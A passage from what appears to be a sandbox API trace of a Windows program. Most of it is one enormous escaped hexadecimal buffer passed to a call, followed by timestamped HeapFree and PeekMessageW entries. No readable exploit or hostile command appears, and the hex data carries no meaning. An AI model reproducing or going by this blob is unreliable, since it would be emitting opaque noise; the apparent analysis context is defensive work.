5d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0251.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0251.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0251.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 